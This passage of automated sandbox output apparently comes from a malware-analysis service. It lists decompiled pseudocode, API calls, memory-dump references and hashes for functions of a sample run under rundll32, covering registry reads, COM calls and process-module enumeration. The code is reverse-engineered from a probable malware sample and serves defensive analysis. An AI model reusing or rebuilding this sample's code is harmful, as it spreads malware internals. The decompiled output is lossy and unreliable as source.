                                                          							_t29 = RegQueryValueExW(_v12, _t34, 0,  &_v20,  &_v8,  &_v16); // executed
                                                          							if(_t29 != 0) {
                                                          								_v8 = _v8 & 0x00000000;
                                                          							}
                                                          							RegCloseKey(_v12);
                                                          						}
                                                          						E00E513CC(_t34);
                                                          					}
                                                          					E00E513CC(_t31);
                                                          				}
                                                          				return _v8;
                                                          			}
                                                          APIs
                                                            • Part of subcall function 00E57206: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,00E567B6,004F0053,00000000,?), ref: 00E5720F
                                                            • Part of subcall function 00E57206: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,00E567B6,004F0053,00000000,?), ref: 00E57239
                                                            • Part of subcall function 00E57206: memset.NTDLL ref: 00E5724D
                                                          • RegOpenKeyExW.KERNEL32(80000002,00000000,00000000,00020119,00000000,006E0049,?,004F0053,00000000,?), ref: 00E567E5
                                                          • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000004,00000000,00000004), ref: 00E56801
                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00E56812
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: CloseOpenQueryValuelstrlenmemcpymemset
                                                          • String ID:
                                                          • API String ID: 830012212-0
                                                          • Opcode ID: e46efe3e1a5f184dac5350a774e349c669c1a9bf86822a08aae2d86e40e81c89
                                                          • Instruction ID: 3287cec4be1cf3c9d1df852c5e5c8f255a1cd2c0fe88cd8f82b397eb467fb3a0
                                                          • Opcode Fuzzy Hash: e46efe3e1a5f184dac5350a774e349c669c1a9bf86822a08aae2d86e40e81c89
                                                          • Instruction Fuzzy Hash: E3115E76500209BFDB11DBD5DC85FAEB7FCAB04306F145865FA01F7062EB709A089B21
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RegCreateKeyA.ADVAPI32(80000001,059BA7F0,059BB184), ref: 055783E5
                                                          • RegOpenKeyA.ADVAPI32(80000001,059BA7F0,059BB184), ref: 055783EF
                                                          • lstrlen.KERNEL32(059BA7F0,00000000,00000000,0559B072,?,?,?,05581876,00000001,00000000,059BB184), ref: 0557840E
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: CreateOpenlstrlen
                                                          • String ID:
                                                          • API String ID: 2865187142-0
                                                          • Opcode ID: 3f35b04b0b47770387ab8c938586effb4e38324f65b58ed39a32a41c9f8a1659
                                                          • Instruction ID: d4e20f00d5b13afa740d77d7f209469b0ddcca98b08409680200f5c5bbdc3f5a
                                                          • Opcode Fuzzy Hash: 3f35b04b0b47770387ab8c938586effb4e38324f65b58ed39a32a41c9f8a1659
                                                          • Instruction Fuzzy Hash: A1F06D7210420CFFE7119F95EC89EAA7B7DFB4A7A4F10800AF90285140D6B09684C7A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SetEvent.KERNEL32(000002DC,05573638), ref: 0558BCAA
                                                            • Part of subcall function 05588323: SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,0558BCB5), ref: 0558834C
                                                            • Part of subcall function 05588323: RtlDeleteCriticalSection.NTDLL(0559C2E0), ref: 0558837F
                                                            • Part of subcall function 05588323: RtlDeleteCriticalSection.NTDLL(0559C300), ref: 05588386
                                                            • Part of subcall function 05588323: CloseHandle.KERNEL32(?,?,0558BCB5), ref: 055883B5
                                                            • Part of subcall function 05588323: ReleaseMutex.KERNEL32(000003F4,00000000,?,?,?,0558BCB5), ref: 055883C6
                                                            • Part of subcall function 05588323: CloseHandle.KERNEL32(?,?,0558BCB5), ref: 055883D2
                                                            • Part of subcall function 05588323: ResetEvent.KERNEL32(00000000,00000000,?,?,?,0558BCB5), ref: 055883DE
                                                            • Part of subcall function 05588323: CloseHandle.KERNEL32(?,?,0558BCB5), ref: 055883EA
                                                            • Part of subcall function 05588323: SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,0558BCB5), ref: 055883F0
                                                            • Part of subcall function 05588323: SleepEx.KERNEL32(00000064,00000001,?,?,0558BCB5), ref: 05588404
                                                            • Part of subcall function 05588323: HeapFree.KERNEL32(00000000,00000000,?,?,0558BCB5), ref: 05588427
                                                            • Part of subcall function 05588323: RtlRemoveVectoredExceptionHandler.NTDLL(00F505B8), ref: 05588460
                                                          • CloseHandle.KERNEL32(000002DC), ref: 0558BCBF
                                                          • HeapDestroy.KERNELBASE(055C0000), ref: 0558BCCF
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: CloseHandle$Sleep$CriticalDeleteEventHeapSection$DestroyExceptionFreeHandlerMutexReleaseRemoveResetVectored
                                                          • String ID:
                                                          • API String ID: 1636361345-0
                                                          • Opcode ID: 7a031478b50717755fda77800fc0c00c8a1a18d32bbed50a5e2c6b42dec69f6e
                                                          • Instruction ID: c09a5afc495af941b811fd5f9c7e6d9df10634fe908cf9d4839a5c17fabae2db
                                                          • Opcode Fuzzy Hash: 7a031478b50717755fda77800fc0c00c8a1a18d32bbed50a5e2c6b42dec69f6e
                                                          • Instruction Fuzzy Hash: D5E062747252029BDB106F75FD8EA363BACBB1455138E4416B403E3150EF2CE408BA24
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 38%
                                                          			E00E53686(intOrPtr _a4) {
                                                          				void* _v12;
                                                          				void* _v16;
                                                          				void* _v20;
                                                          				void* _v24;
                                                          				void* _v28;
                                                          				char _v32;
                                                          				intOrPtr _v40;
                                                          				void* _v46;
                                                          				short _v48;
                                                          				intOrPtr _t49;
                                                          				void* _t51;
                                                          				intOrPtr* _t53;
                                                          				intOrPtr _t56;
                                                          				void* _t58;
                                                          				intOrPtr* _t59;
                                                          				intOrPtr* _t61;
                                                          				intOrPtr* _t63;
                                                          				intOrPtr* _t65;
                                                          				intOrPtr* _t67;
                                                          				intOrPtr* _t69;
                                                          				intOrPtr* _t71;
                                                          				intOrPtr* _t73;
                                                          				intOrPtr _t76;
                                                          				intOrPtr* _t79;
                                                          				short _t81;
                                                          				char* _t97;
                                                          				intOrPtr _t99;
                                                          				void* _t105;
                                                          				void* _t107;
                                                          				intOrPtr _t111;
                                                          
                                                          				_t81 = 0;
                                                          				_v48 = 0;
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				asm("stosw");
                                                          				_t49 =  *0xe5a2d4; // 0x435d5a8
                                                          				_t4 = _t49 + 0xe5b448; // 0x51b89f0
                                                          				_t5 = _t49 + 0xe5b438; // 0x9ba05972
                                                          				_t51 =  *0xe5a140(_t5, 0, 4, _t4,  &_v20); // executed
                                                          				_t105 = _t51;
                                                          				if(_t105 >= 0) {
                                                          					_t53 = _v20;
                                                          					_push( &_v12);
                                                          					_push(1);
                                                          					_push( &_v32);
                                                          					_push(8);
                                                          					_t97 =  &_v48;
                                                          					_push(_t97);
                                                          					_push(_t97);
                                                          					_push(_t53); // executed
                                                          					if( *((intOrPtr*)( *_t53 + 0x3c))() == 0) {
                                                          						_t56 =  *0xe5a2d4; // 0x435d5a8
                                                          						_t30 = _t56 + 0xe5b428; // 0x51b89d0
                                                          						_t31 = _t56 + 0xe5b458; // 0x4c96be40
                                                          						_t58 =  *0xe5a114(_v12, _t31, _t30,  &_v24); // executed
                                                          						_t105 = _t58;
                                                          						_t59 = _v12;
                                                          						 *((intOrPtr*)( *_t59 + 8))(_t59);
                                                          						goto L11;
                                                          					} else {
                                                          						_t71 = _v20;
                                                          						_v16 = 0;
                                                          						_t105 =  *((intOrPtr*)( *_t71 + 0x1c))(_t71,  &_v16);
                                                          						if(_t105 >= 0) {
                                                          							_t111 = _v16;
                                                          							if(_t111 == 0) {
                                                          								_t105 = 0x80004005;
                                                          								goto L11;
                                                          							} else {
                                                          								if(_t111 <= 0) {
                                                          									L11:
                                                          									if(_t105 >= 0) {
                                                          										goto L12;
                                                          									}
                                                          								} else {
                                                          									do {
                                                          										_t73 = _v20;
                                                          										_v48 = 3;
                                                          										_v40 = _t81;
                                                          										_t107 = _t107 - 0x10;
                                                          										asm("movsd");
                                                          										asm("movsd");
                                                          										asm("movsd");
                                                          										asm("movsd");
                                                          										_t105 =  *((intOrPtr*)( *_t73 + 0x20))(_t73,  &_v12);
                                                          										if(_t105 < 0) {
                                                          											goto L7;
                                                          										} else {
                                                          											_t76 =  *0xe5a2d4; // 0x435d5a8
                                                          											_t23 = _t76 + 0xe5b428; // 0x51b89d0
                                                          											_t24 = _t76 + 0xe5b458; // 0x4c96be40
                                                          											_t105 =  *0xe5a114(_v12, _t24, _t23,  &_v24);
                                                          											_t79 = _v12;
                                                          											 *((intOrPtr*)( *_t79 + 8))(_t79);
                                                          											if(_t105 >= 0) {
                                                          												L12:
                                                          												_t63 = _v24;
                                                          												_t105 =  *((intOrPtr*)( *_t63 + 0x3c))(_t63,  &_v28);
                                                          												if(_t105 >= 0) {
                                                          													_t99 =  *0xe5a2d4; // 0x435d5a8
                                                          													_t67 = _v28;
                                                          													_t40 = _t99 + 0xe5b418; // 0x214e3
                                                          													_t105 =  *((intOrPtr*)( *_t67))(_t67, _t40, _a4);
                                                          													_t69 = _v28;
                                                          													 *((intOrPtr*)( *_t69 + 8))(_t69);
                                                          												}
                                                          												_t65 = _v24;
                                                          												 *((intOrPtr*)( *_t65 + 8))(_t65);
                                                          											} else {
                                                          												goto L7;
                                                          											}
                                                          										}
                                                          										goto L15;
                                                          										L7:
                                                          										_t81 = _t81 + 1;
                                                          									} while (_t81 < _v16);
                                                          									goto L11;
                                                          								}
                                                          							}
                                                          						}
                                                          					}
                                                          					L15:
                                                          					_t61 = _v20;
                                                          					 *((intOrPtr*)( *_t61 + 8))(_t61);
                                                          				}
                                                          				return _t105;
                                                          			}


                                                          APIs
                                                          • IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,051B89D0,00E54DD1,?,?,?,?,?,?,?,?,?,?,?,00E54DD1), ref: 00E53752
                                                          • IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,051B89D0,00E54DD1,?,?,?,?,?,?,?,00E54DD1,00000000,00000000,00000000,006D0063), ref: 00E53790
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: QueryServiceUnknown_
                                                          • String ID:
                                                          • API String ID: 2042360610-0
                                                          • Opcode ID: 87f0739bd9c154014b413e33936d7f62bdd2894f54ce4c6c4632ea357c8c64c0
                                                          • Instruction ID: 7b372d5ddb091f21586a6b361d0ac7954988319a90f7610639f531967a4830a1
                                                          • Opcode Fuzzy Hash: 87f0739bd9c154014b413e33936d7f62bdd2894f54ce4c6c4632ea357c8c64c0
                                                          • Instruction Fuzzy Hash: C4512BB5D00219AFCB00CFE8C888DAEB7B9FF48751B14499AE915FB211D731AD45CB61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 75%
                                                          			E00E53969(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
                                                          				void* _v8;
                                                          				void* __esi;
                                                          				intOrPtr* _t35;
                                                          				void* _t40;
                                                          				intOrPtr* _t41;
                                                          				intOrPtr* _t43;
                                                          				intOrPtr* _t45;
                                                          				intOrPtr* _t50;
                                                          				intOrPtr* _t52;
                                                          				void* _t54;
                                                          				intOrPtr* _t55;
                                                          				intOrPtr* _t57;
                                                          				intOrPtr* _t61;
                                                          				intOrPtr* _t65;
                                                          				intOrPtr _t68;
                                                          				void* _t72;
                                                          				void* _t75;
                                                          				void* _t76;
                                                          
                                                          				_t55 = _a4;
                                                          				_t35 =  *((intOrPtr*)(_t55 + 4));
                                                          				_a4 = 0;
                                                          				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
                                                          				if(_t76 < 0) {
                                                          					L18:
                                                          					return _t76;
                                                          				}
                                                          				_t40 = E00E54C9F(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
                                                          				_t76 = _t40;
                                                          				if(_t76 >= 0) {
                                                          					_t61 = _a28;
                                                          					if(_t61 != 0 &&  *_t61 != 0) {
                                                          						_t52 = _v8;
                                                          						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
                                                          					}
                                                          					if(_t76 >= 0) {
                                                          						_t43 =  *_t55;
                                                          						_t68 =  *0xe5a2d4; // 0x435d5a8
                                                          						_t20 = _t68 + 0xe5b1fc; // 0x740053
                                                          						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
                                                          						if(_t76 >= 0) {
                                                          							_t76 = E00E56900(_a4);
                                                          							if(_t76 >= 0) {
                                                          								_t65 = _a28;
                                                          								if(_t65 != 0 &&  *_t65 == 0) {
                                                          									_t50 = _a4;
                                                          									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
                                                          								}
                                                          							}
                                                          						}
                                                          						_t45 = _a4;
                                                          						if(_t45 != 0) {
                                                          							 *((intOrPtr*)( *_t45 + 8))(_t45);
                                                          						}
                                                          						_t57 = __imp__#6;
                                                          						if(_a20 != 0) {
                                                          							 *_t57(_a20);
                                                          						}
                                                          						if(_a12 != 0) {
                                                          							 *_t57(_a12);
                                                          						}
                                                          					}
                                                          				}
                                                          				_t41 = _v8;
                                                          				 *((intOrPtr*)( *_t41 + 8))(_t41);
                                                          				goto L18;
                                                          			}

                                                          Instruction addresses from the disassembly listing (address column of the decompiled function):
                                                          0x00e5396f 0x00e53972 0x00e53982 0x00e5398b 0x00e5398f 0x00e53a5d 0x00e53a63 0x00e53a63
                                                          0x00e539a9 0x00e539ae 0x00e539b2 0x00e539b8 0x00e539bd 0x00e539c4 0x00e539d3 0x00e539d3
                                                          0x00e539d7 0x00e539d9 0x00e539e5 0x00e539f0 0x00e539fb 0x00e539ff 0x00e53a09 0x00e53a0d
                                                          0x00e53a0f 0x00e53a14 0x00e53a1b 0x00e53a2b 0x00e53a2b 0x00e53a14 0x00e53a0d 0x00e53a2d
                                                          0x00e53a32 0x00e53a37 0x00e53a37 0x00e53a3d 0x00e53a43 0x00e53a48 0x00e53a48 0x00e53a4d
                                                          0x00e53a52 0x00e53a52 0x00e53a4d 0x00e539d7 0x00e53a54 0x00e53a5a 0x00000000

                                                          APIs
                                                            • Part of subcall function 00E54C9F: SysAllocString.OLEAUT32(80000002), ref: 00E54CF6
                                                            • Part of subcall function 00E54C9F: SysFreeString.OLEAUT32(00000000), ref: 00E54D5B
                                                          • SysFreeString.OLEAUT32(?), ref: 00E53A48
                                                          • SysFreeString.OLEAUT32(00E554F6), ref: 00E53A52
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: String$Free$Alloc
                                                          • String ID:
                                                          • API String ID: 986138563-0
                                                          • Opcode ID: e7154a4bb95294a7741ba3379d66e7e786a3e86a4df746beef78c42770238bf4
                                                          • Instruction ID: b2661e7a15556ed7f1ec72cb1aea21b9dd4a544f839b77191a70004548d073f1
                                                          • Opcode Fuzzy Hash: e7154a4bb95294a7741ba3379d66e7e786a3e86a4df746beef78c42770238bf4
                                                          • Instruction Fuzzy Hash: 82316672500158EFCF21DFA8C888C9BBBB9FBC97857104A58FC15AB211D331AE55CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E00E52879(intOrPtr* __eax, void* __ecx, void* __edx, void* _a4, void** _a8) {
                                                          				void* _v8;
                                                          				int _v12;
                                                          				char _v16;
                                                          				intOrPtr _v20;
                                                          				intOrPtr _v24;
                                                          				intOrPtr _v28;
                                                          				char _v32;
                                                          				char _v144;
                                                          				int _v148;
                                                          				intOrPtr _v152;
                                                          				intOrPtr _v156;
                                                          				intOrPtr _v160;
                                                          				char _v164;
                                                          				void* _t37;
                                                          				void* _t42;
                                                          				void* _t51;
                                                          				int _t53;
                                                          				void* _t60;
                                                          				void* _t63;
                                                          				void* _t64;
                                                          
                                                          				_t53 = 0;
                                                          				_t60 = __ecx;
                                                          				_v16 = 0;
                                                          				_v12 = 0;
                                                          				_v8 = 0;
                                                          				if(__ecx <= 0x80 ||  *__eax != 0x400) {
                                                          					L21:
                                                          					return _t53;
                                                          				} else {
                                                          					_t58 =  &_v164;
                                                          					_t37 = E00E53C51(__eax, __edx,  &_v164,  &_v16, _a4 + __ecx - 0x80);
                                                          					if(_t37 != 0) {
                                                          						goto L21;
                                                          					}
                                                          					_t61 = _t60 - 0x80;
                                                          					if(_v148 > _t60 - 0x80) {
                                                          						goto L21;
                                                          					}
                                                          					while( *((intOrPtr*)(_t64 + _t37 - 0x8c)) == _t53) {
                                                          						_t37 = _t37 + 1;
                                                          						if(_t37 < 0x10) {
                                                          							continue;
                                                          						}
                                                          						_t53 = _v148;
                                                          						_t51 = E00E55FBC(_t53);
                                                          						_t73 = _t51;
                                                          						_v8 = _t51;
                                                          						if(_t51 != 0) {
                                                          							_t53 = 0;
                                                          							L18:
                                                          							if(_t53 != 0) {
                                                          								goto L21;
                                                          							}
                                                          							L19:
                                                          							if(_v8 != 0) {
                                                          								E00E513CC(_v8);
                                                          							}
                                                          							goto L21;
                                                          						}
                                                          						memcpy(_t51, _a4, _t53);
                                                          						L8:
                                                          						_t63 = _v8;
                                                          						E00E52C05(_t58, _t73, _t63, _t53,  &_v32);
                                                          						if(_v32 != _v164 || _v28 != _v160 || _v24 != _v156 || _v20 != _v152) {
                                                          							L15:
                                                          							_t53 = 0;
                                                          							goto L19;
                                                          						} else {
                                                          							 *_a8 = _t63;
                                                          							goto L18;
                                                          						}
                                                          					}
                                                          					_t58 =  &_v144;
                                                          					_t42 = E00E53276(_t61 & 0xfffffff0, 0,  &_v144, _a4,  &_v8,  &_v12); // executed
                                                          					__eflags = _t42;
                                                          					if(_t42 != 0) {
                                                          						_t53 = _v12;
                                                          						goto L18;
                                                          					}
                                                          					_t53 = _v148;
                                                          					__eflags = _v12 - _t53;
                                                          					if(__eflags >= 0) {
                                                          						goto L8;
                                                          					}
                                                          					goto L15;
                                                          				}
                                                          			}

                                                          Instruction addresses from the disassembly listing (address column of the decompiled function):
                                                          0x00e52884 0x00e52887 0x00e52890 0x00e52893 0x00e52896 0x00e52899 0x00e52995 0x00e52999
                                                          0x00e528ab 0x00e528b7 0x00e528be 0x00e528c5 0x00000000 0x00000000 0x00e528cb 0x00e528d3
                                                          0x00000000 0x00000000 0x00e528d9 0x00e528e2 0x00e528e6 0x00000000 0x00000000 0x00e528e8
                                                          0x00e528ef 0x00e528f4 0x00e528f6 0x00e528f9 0x00e5297a 0x00e52981 0x00e52983 0x00000000
                                                          0x00000000 0x00e52985 0x00e52989 0x00e5298e 0x00e5298e 0x00000000 0x00e52989 0x00e52900
                                                          0x00e52908 0x00e52908 0x00e52911 0x00e5291f 0x00e52976 0x00e52976 0x00000000 0x00e52942
                                                          0x00e52945 0x00000000 0x00e52945 0x00e5291f 0x00e52954 0x00e52962 0x00e52967 0x00e52969
                                                          0x00e5297e 0x00000000 0x00e5297e 0x00e5296b 0x00e52971 0x00e52974 0x00000000 0x00000000
                                                          0x00000000 0x00e52974

                                                          APIs
                                                          • memcpy.NTDLL(00000000,?,?,?,?,?,?,{Q,?,?), ref: 00E52900
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: memcpy
                                                          • String ID: {Q
                                                          • API String ID: 3510742995-1336059103
                                                          • Opcode ID: 647bc8f6d7f8c9729684f43621a4d6fa48c0cfc356c6c07f18a6e3ed7e17fe69
                                                          • Instruction ID: 69610ce73bf3e5176494d089e84948806c34402a445846efa26fc957c23449af
                                                          • Opcode Fuzzy Hash: 647bc8f6d7f8c9729684f43621a4d6fa48c0cfc356c6c07f18a6e3ed7e17fe69
                                                          • Instruction Fuzzy Hash: FF316371900119EFDF14DEA4C880BEDB3B8BB56319F1458ADEA49B7251D7309E488B60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 50%
                                                          			E00E56566(intOrPtr* __eax, intOrPtr _a4) {
                                                          				void* _v8;
                                                          				void* _v12;
                                                          				void* _v16;
                                                          				intOrPtr* _t22;
                                                          				void* _t23;
                                                          				intOrPtr* _t24;
                                                          				intOrPtr* _t26;
                                                          				intOrPtr* _t28;
                                                          				intOrPtr* _t30;
                                                          				void* _t31;
                                                          				intOrPtr* _t32;
                                                          				intOrPtr _t42;
                                                          				intOrPtr _t45;
                                                          				intOrPtr _t48;
                                                          				void* _t51;
                                                          
                                                          				_push( &_v16);
                                                          				_t42 =  *0xe5a2d4; // 0x435d5a8
                                                          				_t2 = _t42 + 0xe5b468; // 0x20400
                                                          				_push(0);
                                                          				_push(__eax);
                                                          				_t51 =  *((intOrPtr*)( *__eax + 0x3c))();
                                                          				if(_t51 >= 0) {
                                                          					_t22 = _v16;
                                                          					_t45 =  *0xe5a2d4; // 0x435d5a8
                                                          					_t6 = _t45 + 0xe5b488; // 0xe7a1af80
                                                          					_t23 =  *((intOrPtr*)( *_t22))(_t22, _t6,  &_v12); // executed
                                                          					_t51 = _t23;
                                                          					if(_t51 >= 0) {
                                                          						_t26 = _v12;
                                                          						_t51 =  *((intOrPtr*)( *_t26 + 0x1c))(_t26,  &_v8);
                                                          						if(_t51 >= 0) {
                                                          							_t48 =  *0xe5a2d4; // 0x435d5a8
                                                          							_t30 = _v8;
                                                          							_t12 = _t48 + 0xe5b478; // 0xa4c6892c
                                                          							_t31 =  *((intOrPtr*)( *_t30))(_t30, _t12, _a4); // executed
                                                          							_t51 = _t31;
                                                          							_t32 = _v8;
                                                          							 *((intOrPtr*)( *_t32 + 8))(_t32);
                                                          						}
                                                          						_t28 = _v12;
                                                          						 *((intOrPtr*)( *_t28 + 8))(_t28);
                                                          					}
                                                          					_t24 = _v16;
                                                          					 *((intOrPtr*)( *_t24 + 8))(_t24);
                                                          				}
                                                          				return _t51;
                                                          			}

                                                          Instruction addresses from the disassembly listing (address column of the decompiled function):
                                                          0x00e56572 0x00e56573 0x00e56579 0x00e56580 0x00e56582 0x00e56586 0x00e5658a 0x00e5658c
                                                          0x00e56595 0x00e5659b 0x00e565a3 0x00e565a5 0x00e565a9 0x00e565ab 0x00e565b8 0x00e565bc
                                                          0x00e565c1 0x00e565c7 0x00e565cc 0x00e565d4 0x00e565d6 0x00e565d8 0x00e565de 0x00e565de
                                                          0x00e565e1 0x00e565e7 0x00e565e7 0x00e565ea 0x00e565f0 0x00e565f0 0x00e565f7

                                                          APIs
                                                          • IUnknown_QueryInterface_Proxy.RPCRT4(?,E7A1AF80,?), ref: 00E565A3
                                                          • IUnknown_QueryInterface_Proxy.RPCRT4(?,A4C6892C,?), ref: 00E565D4
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Interface_ProxyQueryUnknown_
                                                          • String ID:
                                                          • API String ID: 2522245112-0
                                                          • Opcode ID: 5bbd273b72d05eab78aeac444470d6cba4875e94c710da5b6f94a9c66a3c0324
                                                          • Instruction ID: 8fae05058290a050caef554c93ab87f673f02dc3b544b5e530412a586a1aa70e
                                                          • Opcode Fuzzy Hash: 5bbd273b72d05eab78aeac444470d6cba4875e94c710da5b6f94a9c66a3c0324
                                                          • Instruction Fuzzy Hash: D2214275A00619EFCB04CBA4C884D9AB7B9FF88705B148A94ED05EF325D731ED45CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 05585EA9: RtlAllocateHeap.NTDLL(00000000,?,05586423), ref: 05585EB5
                                                          • EnumProcessModules.PSAPI(00000008,00000000,00001000,00000000,00001000), ref: 0557470A
                                                          • GetLastError.KERNEL32(00000008,00000000,00001000,00000000,00001000), ref: 05574751
                                                            • Part of subcall function 0557231D: RtlFreeHeap.NTDLL(00000000,?,0557D1F9,?,00000000,751881D0,00000000,?,?,?,055756D1,?,00000000,00000000), ref: 05572329
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocateEnumErrorFreeLastModulesProcess
                                                          • String ID:
                                                          • API String ID: 552344955-0
                                                          • Opcode ID: 020e7ed5d350b3d7935bff8e0da37da433909c19434fb5fcaf260912f58d15b9
                                                          • Instruction ID: 1f65169063ca22d88f5b5b117c2f99b13f236f6f3ff8f0a52e3fbe985bc34e98
                                                          • Opcode Fuzzy Hash: 020e7ed5d350b3d7935bff8e0da37da433909c19434fb5fcaf260912f58d15b9
                                                          • Instruction Fuzzy Hash: E211A975A1020DFBCB11EFA9E884BAEBBB9FFD1355F204099E40197200DB759A05CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SafeArrayCreate.OLEAUT32(00000011,00000001,80000002), ref: 00E529C4
                                                            • Part of subcall function 00E53969: SysFreeString.OLEAUT32(?), ref: 00E53A48
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 00E52A11
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: ArraySafe$CreateDestroyFreeString
                                                          • String ID:
                                                          • API String ID: 3098518882-0
                                                          • Opcode ID: 231115aa51eb674db7b9882dca1760211261c2d369b2e6d4ea0aebc2b4597519
                                                          • Instruction ID: b26862ea45ab933230be6517fcfb82dc761d60903b3372fdad0b220b63a77325
                                                          • Opcode Fuzzy Hash: 231115aa51eb674db7b9882dca1760211261c2d369b2e6d4ea0aebc2b4597519
                                                          • Instruction Fuzzy Hash: 8A11527690020ABFDB10DFA5DC45AEEBBB9EB04351F004865FA04F7161D3749A19DB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
